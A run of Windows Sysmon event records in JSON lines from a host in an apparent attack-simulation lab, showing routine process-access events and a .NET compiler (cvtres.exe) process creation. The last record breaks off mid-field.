{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5442,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5443,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5444,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5445,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5446,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5447,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5448,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5449,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010AB730A00}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010AB730A00}","TargetProcessId":"2820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5450,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.886\r\nProcessGuid: {A837DB8D-032E-5F25-0000-00103A770A00}\r\nProcessId: 4552\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESDDF4.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC21263F864C234A3C97BFB996E7FF15B1.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: 